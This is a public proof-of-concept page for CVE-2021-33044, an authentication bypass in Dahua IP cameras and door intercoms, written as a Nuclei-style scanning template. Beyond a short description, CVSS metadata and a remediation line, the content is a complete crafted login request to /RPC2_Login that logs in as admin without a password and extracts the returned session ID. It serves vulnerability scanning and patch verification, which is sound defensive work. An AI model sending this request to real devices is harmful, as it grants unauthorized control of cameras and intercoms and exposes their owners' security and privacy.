CVE-2021-33044: Dahua IPC/VTH/VTO - Authentication Bypass

2025-08-01 Dahua IPC VTH VTO PoC Public

Description

Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.

PoC

id: CVE-2021-33044

info:
  name: Dahua IPC/VTH/VTO - Authentication Bypass
  author: gy741
  severity: critical
  description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
  impact: |
    An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.
  remediation: |
    Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.
  reference:
    - https://github.com/dorkerdevil/CVE-2021-33044
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
    - https://seclists.org/fulldisclosure/2021/Oct/13
    - https://www.dahuasecurity.com/support/cybersecurity/details/957
    - https://github.com/bp2008/DahuaLoginBypass
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33044
    cwe-id: CWE-287
    epss-score: 0.99871
    epss-percentile: 0.99963
    cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dahuasecurity
    product: ipc-hum7xxx_firmware
  tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity,kev,vkev,vuln

http:
  - raw:
      - |
        POST /RPC2_Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Connection: close
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":true,"session"'
          - 'id'
          - 'params'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - ',"result":true,"session":"([a-z]+)"\}'
        part: body
# digest: 4b0a00483046022100c6ee39da9c8602ab5d249afe2c94a48c60e2e743d0b39a70946396d92a60d5a3022100b6f9b2c5116f6e60df9d183a422833ff8d1b067da182fcc9ca0a7b4ae83230c7:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities